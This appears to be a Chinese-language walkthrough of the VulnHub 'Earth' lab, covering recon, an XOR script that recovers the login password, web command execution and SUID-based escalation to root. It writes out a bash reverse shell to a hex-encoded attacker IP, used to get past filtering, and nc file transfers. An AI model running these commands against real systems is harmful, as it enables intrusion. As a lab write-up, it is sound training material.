Vunlhub_Eearth
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。
因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及分享者无关
主机信息
kali:192.168.3.150
Earth:192.168.3.149信息收集
使用Nmap探测目标主机发现开放22、80、443三个端口
nmap -A -p- 192.168.3.149
打开80端口查看是一个400的页面
访问443端口发现是一个testpage
查看源码也没获得有价值的信息
扫描80和443端口网站的目录,没没有获得什么信息
接着再看nmap的扫描信息发现在443端口有两个域名
然后将两个域名添加到hosts文件中
浏览器访问域名发现可以正常显示
在网站下面找到了一个输入框和一些文字
通过扫描找到了一个登录页面
通过对另一个域名的扫描找到了一个robots.txt的文件
dirb https://terratest.earth.local /PTE_Tools/Wordlist/ctfDict/ctf.txt
打开厚爱发现一个testingnote.*的文件
然后根据提示的后缀进行尝试,找到了一个testingnot.txt的文件
访问testingnotes.txt中提到的文件得到一下内容
查看testingnotes中的提示,得到加密使用XOR方式,terra为管理员
如果使用XOR,那么猜测http://earth.local页面底部的字符串应该是用于异或运算
将testdata.txt保存下来
然后使用python写一个脚本,得到密钥
# -*- coding: utf-8 -*-
# @Time : 2021/12/26 6:36 下午
# @Author : JacobWang
# @File : xor.py
# @Software: PyCharmimport binascii# data1 = "37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40"# data1 = "3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45"data1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
f = binascii.b2a_hex(open('testdata.txt', 'rb').read()).decode()
print(hex(int(data1, 16) ^ int(f, 16)))
使用密钥earthclimatechangebad4humans登录
登录后发现可以执行命令
使用命令执行来查找flag
find / -name "*flag*"
得到第一个Flag
GETSHELL
在测试中发现使用bash、python反弹shell均不行,然后将IP替换为16进制后可以正常反弹
bash -i >& /dev/tcp/0xc0.0xa8.0x3.0x96/1234 0>&1
查找具有SUID权限的可执行文件
find / -perm -u=s -type f 2>/dev/null
尝试执行这个文件发现报错,提示触发器不存在
提权
使用nc将这个文件传送到本机
kali: nc -lnvp 4444 >reset_root
Earth: nc 192.168.3.150 4444 < /usr/bin/reset_root
使用ltrace调试后发现会检查三个文件是否存在
再次执行后重置完成
然后切换到root账户密码Earth
最后拿到root_flag
加入我的星球
下方查看历史文章
VulnHub之DC-1
VulnHub之DC-2
VulnHub之DC-3
VulnHub之DC-4
VulnHub之MuzzyBox
【工具分享】AWVS 12 汉化破解版
通达OA任意上传&文件包含漏洞复现
扫描二维码
获取更多精彩
NowSec
Vunlhub_Eearth相关推荐
最新文章
- 看,这就是你心心念的研究生生活
- sql 字符串函数(一)
- Istio 网关之南北向流量管理(内含服务网格专家亲自解答)
- kali-linux虚拟机与主机共享文件
- 边记边学PHP-(十五)MySQL数据库基础操作2
- [Snoi2017]炸弹
- 统计学习方法(一)统计学习方法概论
- 工作373-前端 import与export区别
- mongodb分片概念和原理-实战分片集群
- ES6 -数组的扩展
- ASP.NET 运行机制详解
- 熊猫read_csv()–将CSV文件读取到DataFrame
- KEIL使用malloc函数申请堆空间失败的解决方法
- 浙江大学计算机考研最新,2017年浙江大学计算机考研复试分数线_浙江大学考研分数线...
- 4 数据校验和防碰撞
- 建筑施工员日常工作内容,施工员证全国通用吗?
- 接上个文章(mzsock
- 使用python对字符串进行md5加密
- 基于室内定位技术的化工厂人员定位系统--化工厂定位--新导智能
- 常用的表格正则验证 + 省份选择 JS JQ